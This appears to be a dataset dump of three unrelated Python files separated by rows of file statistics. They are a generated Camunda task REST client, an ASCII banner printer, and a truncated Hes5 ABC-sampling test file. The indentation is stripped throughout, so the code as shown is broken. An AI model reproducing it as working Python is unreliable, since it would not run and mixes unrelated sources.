Queries for tasks that fulfill a given filter. This method is slightly more powerful than the [Get Tasks](https://docs.camunda.org/manual/7.13/reference/rest/task/get-query/) method because it allows filtering by multiple process or task variables of types `String`, `Number` or `Boolean`. The size of the result set can be retrieved by using the [Get Task Count (POST)](https://docs.camunda.org/manual/7.13/reference/rest/task/post-query-count/) method. **Security Consideration**: There are several parameters (such as `assigneeExpression`) for specifying an EL expression. These are disabled by default to prevent remote code execution. See the section on [security considerations for custom code](https://docs.camunda.org/manual/7.13/user-guide/process-engine/securing-custom-code/) in the user guide for details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.query_tasks(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int first_result: Pagination of results. Specifies the index of the first result to return.
:param int max_results: Pagination of results. Specifies the maximum number of results to return. Will return less results if there are no more results left.
:param TaskQueryDto task_query_dto:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[TaskDto]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.query_tasks_with_http_info(**kwargs) # noqa: E501
def query_tasks_with_http_info(self, **kwargs): # noqa: E501
"""query_tasks # noqa: E501
Queries for tasks that fulfill a given filter. This method is slightly more powerful than the [Get Tasks](https://docs.camunda.org/manual/7.13/reference/rest/task/get-query/) method because it allows filtering by multiple process or task variables of types `String`, `Number` or `Boolean`. The size of the result set can be retrieved by using the [Get Task Count (POST)](https://docs.camunda.org/manual/7.13/reference/rest/task/post-query-count/) method. **Security Consideration**: There are several parameters (such as `assigneeExpression`) for specifying an EL expression. These are disabled by default to prevent remote code execution. See the section on [security considerations for custom code](https://docs.camunda.org/manual/7.13/user-guide/process-engine/securing-custom-code/) in the user guide for details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.query_tasks_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int first_result: Pagination of results. Specifies the index of the first result to return.
:param int max_results: Pagination of results. Specifies the maximum number of results to return. Will return less results if there are no more results left.
:param TaskQueryDto task_query_dto:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[TaskDto], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'first_result',
'max_results',
'task_query_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method query_tasks" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'first_result' in local_var_params and local_var_params['first_result'] is not None: # noqa: E501
query_params.append(('firstResult', local_var_params['first_result'])) # noqa: E501
if 'max_results' in local_var_params and local_var_params['max_results'] is not None: # noqa: E501
query_params.append(('maxResults', local_var_params['max_results'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'task_query_dto' in local_var_params:
body_params = local_var_params['task_query_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TaskDto]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def query_tasks_count(self, **kwargs): # noqa: E501
"""query_tasks_count # noqa: E501
Retrieves the number of tasks that fulfill the given filter. Corresponds to the size of the result set of the [Get Tasks (POST)](https://docs.camunda.org/manual/7.13/reference/rest/task/post-query/) method and takes the same parameters. **Security Consideration**: There are several parameters (such as `assigneeExpression`) for specifying an EL expression. These are disabled by default to prevent remote code execution. See the section on [security considerations for custom code](https://docs.camunda.org/manual/7.13/user-guide/process-engine/securing-custom-code/) in the user guide for details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.query_tasks_count(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param TaskQueryDto task_query_dto:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: CountResultDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.query_tasks_count_with_http_info(**kwargs) # noqa: E501
def query_tasks_count_with_http_info(self, **kwargs): # noqa: E501
"""query_tasks_count # noqa: E501
Retrieves the number of tasks that fulfill the given filter. Corresponds to the size of the result set of the [Get Tasks (POST)](https://docs.camunda.org/manual/7.13/reference/rest/task/post-query/) method and takes the same parameters. **Security Consideration**: There are several parameters (such as `assigneeExpression`) for specifying an EL expression. These are disabled by default to prevent remote code execution. See the section on [security considerations for custom code](https://docs.camunda.org/manual/7.13/user-guide/process-engine/securing-custom-code/) in the user guide for details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.query_tasks_count_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param TaskQueryDto task_query_dto:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(CountResultDto, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'task_query_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method query_tasks_count" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'task_query_dto' in local_var_params:
body_params = local_var_params['task_query_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/count', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CountResultDto', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def resolve(self, id, **kwargs): # noqa: E501
"""resolve # noqa: E501
Resolves a task and updates execution variables. Resolving a task marks that the assignee is done with the task delegated to them, and that it can be sent back to the owner. Can only be executed when the task has been delegated. The assignee will be set to the owner, who performed the delegation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.resolve(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to resolve. (required)
:param CompleteTaskDto complete_task_dto:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.resolve_with_http_info(id, **kwargs) # noqa: E501
def resolve_with_http_info(self, id, **kwargs): # noqa: E501
"""resolve # noqa: E501
Resolves a task and updates execution variables. Resolving a task marks that the assignee is done with the task delegated to them, and that it can be sent back to the owner. Can only be executed when the task has been delegated. The assignee will be set to the owner, who performed the delegation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.resolve_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to resolve. (required)
:param CompleteTaskDto complete_task_dto:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'complete_task_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method resolve" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `resolve`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'complete_task_dto' in local_var_params:
body_params = local_var_params['complete_task_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/resolve', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def set_assignee(self, id, **kwargs): # noqa: E501
"""set_assignee # noqa: E501
Changes the assignee of a task to a specific user. **Note:** The difference with the [Claim Task](https://docs.camunda.org/manual/7.13/reference/rest/task/post-claim/) method is that this method does not check if the task already has a user assigned to it. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_assignee(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to set the assignee for. (required)
:param UserIdDto user_id_dto: Provide the id of the user that will be the assignee of the task.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.set_assignee_with_http_info(id, **kwargs) # noqa: E501
def set_assignee_with_http_info(self, id, **kwargs): # noqa: E501
"""set_assignee # noqa: E501
Changes the assignee of a task to a specific user. **Note:** The difference with the [Claim Task](https://docs.camunda.org/manual/7.13/reference/rest/task/post-claim/) method is that this method does not check if the task already has a user assigned to it. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_assignee_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to set the assignee for. (required)
:param UserIdDto user_id_dto: Provide the id of the user that will be the assignee of the task.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'user_id_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method set_assignee" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `set_assignee`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'user_id_dto' in local_var_params:
body_params = local_var_params['user_id_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/assignee', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def submit(self, id, **kwargs): # noqa: E501
"""submit # noqa: E501
Completes a task and updates process variables using a form submit. There are two difference between this method and the `complete` method: * If the task is in state `PENDING` - i.e., has been delegated before, it is not completed but resolved. Otherwise it will be completed. * If the task has Form Field Metadata defined, the process engine will perform backend validation for any form fields which have validators defined. See the [Generated Task Forms](https://docs.camunda.org/manual/7.13/user-guide/task-forms/_index/#generated-task-forms) section of the [User Guide](https://docs.camunda.org/manual/7.13/user-guide/) for more information. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.submit(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to submit the form for. (required)
:param CompleteTaskDto complete_task_dto:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: dict(str, VariableValueDto)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.submit_with_http_info(id, **kwargs) # noqa: E501
def submit_with_http_info(self, id, **kwargs): # noqa: E501
"""submit # noqa: E501
Completes a task and updates process variables using a form submit. There are two difference between this method and the `complete` method: * If the task is in state `PENDING` - i.e., has been delegated before, it is not completed but resolved. Otherwise it will be completed. * If the task has Form Field Metadata defined, the process engine will perform backend validation for any form fields which have validators defined. See the [Generated Task Forms](https://docs.camunda.org/manual/7.13/user-guide/task-forms/_index/#generated-task-forms) section of the [User Guide](https://docs.camunda.org/manual/7.13/user-guide/) for more information. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.submit_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to submit the form for. (required)
:param CompleteTaskDto complete_task_dto:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(dict(str, VariableValueDto), status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'complete_task_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method submit" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `submit`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'complete_task_dto' in local_var_params:
body_params = local_var_params['complete_task_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/submit-form', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, VariableValueDto)', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def unclaim(self, id, **kwargs): # noqa: E501
"""unclaim # noqa: E501
Resets a task's assignee. If successful, the task is not assigned to a user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unclaim(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to unclaim. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.unclaim_with_http_info(id, **kwargs) # noqa: E501
def unclaim_with_http_info(self, id, **kwargs): # noqa: E501
"""unclaim # noqa: E501
Resets a task's assignee. If successful, the task is not assigned to a user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unclaim_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to unclaim. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method unclaim" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `unclaim`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/unclaim', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_task(self, id, **kwargs): # noqa: E501
"""update_task # noqa: E501
Updates a task. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_task(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to be updated. (required)
:param TaskDto task_dto:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_task_with_http_info(id, **kwargs) # noqa: E501
def update_task_with_http_info(self, id, **kwargs): # noqa: E501
"""update_task # noqa: E501
Updates a task. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_task_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to be updated. (required)
:param TaskDto task_dto:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'task_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_task" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `update_task`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'task_dto' in local_var_params:
body_params = local_var_params['task_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 71.893979 | 902 | 0.672891 | 32,493 | 244,799 | 4.878959 | 0.019143 | 0.042591 | 0.070825 | 0.029723 | 0.991939 | 0.990343 | 0.989706 | 0.989182 | 0.986489 | 0.98271 | 0 | 0.018469 | 0.248195 | 244,799 | 3,404 | 903 | 71.9151 | 0.842926 | 0.57182 | 0 | 0.847359 | 1 | 0 | 0.260165 | 0.117149 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024956 | false | 0 | 0.002902 | 0 | 0.052815 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
4bcbcf87e4fb183d23e7e22b0d56d50b5a3a1e74 | 998 | py | Python | lib_trainer/banner_info.py | lakiw/improv | 232712e3d72ecc689741bce9a2c366a9f95096dc | [
"MIT"
] | 1 | 2021-06-22T15:30:01.000Z | 2021-06-22T15:30:01.000Z | lib_trainer/banner_info.py | lakiw/improv | 232712e3d72ecc689741bce9a2c366a9f95096dc | [
"MIT"
] | null | null | null | lib_trainer/banner_info.py | lakiw/improv | 232712e3d72ecc689741bce9a2c366a9f95096dc | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""
Contains banner ascii art and displays for the training program
"""
def print_banner():
"""
ASCII art for the banner
Putting it here to make it easier to change
"""
print()
print(''' __ __''')
print(''' _____ __ __ _____ _____ ____\ \ / /''')
print('''|_ _| \/ | __ \| __ \ / __ \\\ \ / / ''')
print(''' | | | \ / | |__) | |__) | | | \\\ \/ / ''')
print(''' | | | |\/| | ___/| _ /| | | | \ / ''')
print(''' _| |_| | | | | | | \ \| |__| | \/ ''')
print('''|_____|_| |_|_|_ |_| \_\\\____/ ''')
print('''|__ __| (_) ''')
print(''' | |_ __ __ _ _ _ __ ___ _ __ ''')
print(''' | | '__/ _` | | '_ \ / _ \ '__| ''')
print(''' | | | | (_| | | | | | __/ | ''')
print(''' |_|_| \__,_|_|_| |_|\___|_| ''')
print() | 35.642857 | 64 | 0.315631 | 45 | 998 | 4.644444 | 0.511111 | 0.62201 | 0.861244 | 1.052632 | 0.334928 | 0.334928 | 0.334928 | 0.334928 | 0.334928 | 0.334928 | 0 | 0.001767 | 0.432866 | 998 | 28 | 65 | 35.642857 | 0.367491 | 0.155311 | 0 | 0.133333 | 0 | 0.066667 | 0.656962 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | true | 0 | 0 | 0 | 0.066667 | 1 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
4be7d919372d09360e1b745f13c53c2ff85b0a25 | 544,712 | py | Python | test/test_manning_et_al_2019/test_additional_analysis_of_hes5_system.py | kursawe/hesdynamics | e7dd743ba6fcf36bd31937ec4c2c96bd890cc606 | [
"BSD-3-Clause"
] | null | null | null | test/test_manning_et_al_2019/test_additional_analysis_of_hes5_system.py | kursawe/hesdynamics | e7dd743ba6fcf36bd31937ec4c2c96bd890cc606 | [
"BSD-3-Clause"
] | null | null | null | test/test_manning_et_al_2019/test_additional_analysis_of_hes5_system.py | kursawe/hesdynamics | e7dd743ba6fcf36bd31937ec4c2c96bd890cc606 | [
"BSD-3-Clause"
] | null | null | null | import unittest
import os
os.environ["OMP_NUM_THREADS"] = "1"
import os.path
import sys
import matplotlib as mpl
import matplotlib.gridspec
mpl.use('Agg')
mpl.rcParams['mathtext.default'] = 'regular'
import matplotlib.pyplot as plt
font = {'size' : 10}
plt.rc('font', **font)
import numpy as np
import pandas as pd
import seaborn as sns
# import xlrd
# make sure we find the right python module
sys.path.append(os.path.join(os.path.dirname(__file__),'..','..','src'))
import hes5
class TestSimpleHes5ABC(unittest.TestCase):
def xest_make_abc(self):
## generate posterior samples
total_number_of_samples = 2000
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
use_langevin = False)
self.assertEquals(my_prior_samples.shape,
(total_number_of_samples, 4))
def xest_make_abc_on_cluster(self):
## generate posterior samples
total_number_of_samples = 20000
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
number_of_traces_per_sample = 16,
number_of_cpus = 16,
use_langevin = False )
self.assertEquals(my_prior_samples.shape,
(total_number_of_samples, 4))
def xest_plot_abc_differently(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results')
acceptance_ratio = 0.03
total_number_of_samples = 2000
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
distance_table = hes5.calculate_distances_to_data(model_results)
my_posterior_samples = hes5.select_posterior_samples( prior_samples,
distance_table,
acceptance_ratio )
self.assertEquals(my_posterior_samples.shape,
(int(round(total_number_of_samples*acceptance_ratio)), 4))
# plot distribution of accepted parameter samples
data_frame = pd.DataFrame( data = my_posterior_samples,
columns= ['transcription_rate',
'translation_rate',
'repression_threshold',
'transcription_delay'])
pairplot = sns.pairplot(data_frame)
# pairplot.map_diag(sns.kdeplot)
# pairplot.map_diag(sns.distplot, kde = False, rug = True)
# pairplot.map_offdiag(sns.kdeplot, cmap="Blues_d", n_levels=10)
# pairplot.map_offdiag(sns.jointplot )
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_dots_' + str(total_number_of_samples) + '_'
+ str(acceptance_ratio) + '.pdf'))
def xest_plot_abc_in_band(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results')
acceptance_ratio = 0.03
total_number_of_samples = 2000
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
